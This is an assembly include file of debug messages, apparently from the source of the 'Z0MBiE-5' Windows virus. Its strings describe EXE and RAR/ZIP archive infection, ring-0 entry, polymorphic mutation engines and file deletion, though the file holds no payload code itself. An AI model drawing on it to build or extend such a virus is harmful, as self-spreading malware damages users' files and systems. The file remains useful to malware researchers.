
; ***WARNING***
; this file will be read into virus data buffer and used while DEBUG session.

; %s    asciiz
; %d    decimal (dword)
; %h    hex (dword)
; %?    ask yes/no, return ZR if yes
; %#    just getkey

                        msgn    = 0
x                       macro   abc
IFDEF   DEBUG
                        msgn    = msgn + 1
msg_&abc                =       msgn
ENDIF ; DEBUG
                        endm

x startup    ;; infected file started - welcome to Z0MBiE-5 debug session
x randomize  ;; initial randseed = 0x%d
x kexpok     ;; kernel functions exported ok
x infectexe  ;; infecting EXE file: %s...
x somewrite  ;; something written into file
x infectok   ;; successfully infected
x alredysign ;; file alredy infected (header-signature)
x alredytime ;; file alredy infected (time-signature)
x way1       ;; way1 selected (ExitProcess dispatch)
x way2       ;; way2 selected (thread)
x ret2host   ;; returning to host
x sehinit    ;; SEH:init
x sehdone    ;; SEH:done
x seherror   ;; SEH:error!!!
x servok     ;; service process registered
x epfunc     ;; exitprocess-func start
x epexit     ;; exitprocess-func exit
x thfunc     ;; thread-func start
x thexit     ;; thread-func exit
x adstart    ;; archive-dropper: start
x adexit     ;; archive-dropper: exit
x adrun      ;; archive-dropper: executing '%s'
x erropen    ;; error opening file
x errfind    ;; cant find file %s
x dsload     ;; debug strings loaded, %i bytes
x askinfect  ;; infect file? (Y/N): %?
x gencopy    ;; gencopy: start
x genok      ;; gencopy: success
x generr     ;; gencopy: error
x rpmeerr    ;; RPME error %i (1=disasm,2=smallbuf,3=nomemory,4=notyet,5=badjmp)
x getkey     ;; press a key...%# ok
x kmeerr     ;; KME error
x sleep      ;; sleep %i ms
x r0init     ;; ring0-init
x r0done     ;; ring0-success
x gfa        ;; globalfindatom %s
x gfafound   ;; atom found
x gfanot     ;; atom not found, but now created
x gfadel     ;; atom deleted
x scaninit   ;; scanner: init
x scanexit   ;; scanner: exit
x pexplorer  ;; calling process_explorer
x pfilez     ;; calling process_filez
x pwindir    ;; calling process_windir
x ppath      ;; calling process_path
x pdrives    ;; calling process_drives
x infectrar  ;; infecting RAR archive %s
x infectzip  ;; infecting ZIP archive %s
x zipalredy  ;; zip alredy infected (dropper name %s)
x raralredy  ;; rar alredy infected (dropper name %s)
x infzip     ;; infecting zip (dropper name %s)
x infrar     ;; infecting rar (dropper name %s)
x copyfile1  ;; copying %s ...
x copyfile2  ;;     ... into %s
x wii        ;; wininit: %s
x writing    ;; writing (((%s)))
x movefilex1 ;; MoveFileEx %s ...
x movefilex2 ;;        ... into %s
x delfile    ;; deleting file %s
x argv0fn    ;; argv0.filename = %s
x argv0r     ;; getargv0: loading %s into memory
x godir      ;; directory of %s
x explcont   ;; explorer: continue copying/infecting? (Y/N): %?
x killfile   ;; killing file %s (skipped in DEBUG version)
x nomem      ;; *** NO MEMORY error ***
x creath     ;; creating thread
x fill0z     ;; filling old virus memory image with 0z
x mut1       ;; RPME --permutate
x mut2       ;; ETG  --internal trash
x mut3       ;; KME  --compress
x mut4       ;; KME  --compress
x mut5       ;; ETG  --external trash
x mut6       ;; KME  --poly
x sizeis     ;; ...size=%i bytes
x downgrade  ;; ***DOWNGRADE***
x codelen    ;; usermut: summary code size = %i bytes
x haveovr    ;; file has overlay, exiting
x perv       ;; perverting %i bytes
x mut4skip   ;; KME  --compress -- SKIPPED PASS#2
x csum       ;; checksum recalculated ok
x memok      ;; memory allocated ok, %i bytes
x skipall    ;; skipping ALL poly shit
x prcg       ;; PRCG --poly cyclez
x r02init    ;; ring-0 (#2) init
x r02done    ;; ring-0 (#2) done

